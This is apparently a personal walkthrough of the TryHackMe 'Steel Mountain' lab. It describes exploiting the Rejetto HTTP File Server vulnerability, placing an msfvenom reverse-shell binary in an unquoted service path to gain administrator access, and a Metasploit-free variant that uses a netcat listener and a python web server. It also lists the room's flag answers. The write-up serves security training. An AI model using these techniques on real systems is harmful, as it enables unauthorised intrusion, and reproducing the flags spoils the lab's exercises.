TryHackMe - Steel Mountain

INTRODUCTION

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

Deploy the machine. Who is the employee of the month?

Bill Harper

INITIAL ACCESS

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

Click hyperlinked HttpFileServer 2.3 :

rejetto http file server

What is the CVE number to exploit this file server?

2014-6287

Use Metasploit to get an initial shell. What is the user flag?

��b04763b6fcf51fcd7c13abc7db4fd365

PRIVILEDGE ESCALATION

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.“

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

I copy/pasted contents of script into Sublime Text and saved as PowerUp.ps1 on Kali

Uploaded in meterpreter:

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

AdvancedSystemCareService9

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

Before retsrating the service, we need to set up a listener within our local terminal:

We can then start the service in our meterpreter shell:

Listener connects:

9af5f314f57607c00fd09803a587db80

ACCESS AND ESCALATION WITHOUT METASPLOIT

We will now take a look at gaining access and privilege escalation without the use of Metasploit. For this, we will utilise PowerShell and winPEAS to enumerate the system and collect the relevant information to escalate to root.

We will use the same CVE, but this time use the python script here.

In order for this attack to work, it will require a web server and netcat listener to be active at the same time. If you do not already have a netcat static binary on your system then you can download this from GitHub.

We will also use winPEAS, which can be downloaded here.

For simplicity, I created a folder named steel containing the exploit script (39161.py), netcat binary (nc.exe)

winPEAS already on Kali @ /usr/share/winPEAS/winPEASexe/winPEAS/obj/Release/winPEAS.exe but I copied it into a folder for this:

Before the attack can run, we need to edit the exploit with details of our local IP address and local port number being used for our listener:

3 separate terminal windows are then required to complete the attack.

Terminal 1 – python HTTP web server

Then start a simple python http web server:

Terminal 2 – netcat listener

Terminal 3 – to execute the attack

the final command needs to be run TWICE – the first instance will pull the netcat binary to the target and the second will execute the payload to gain a callback within the listener.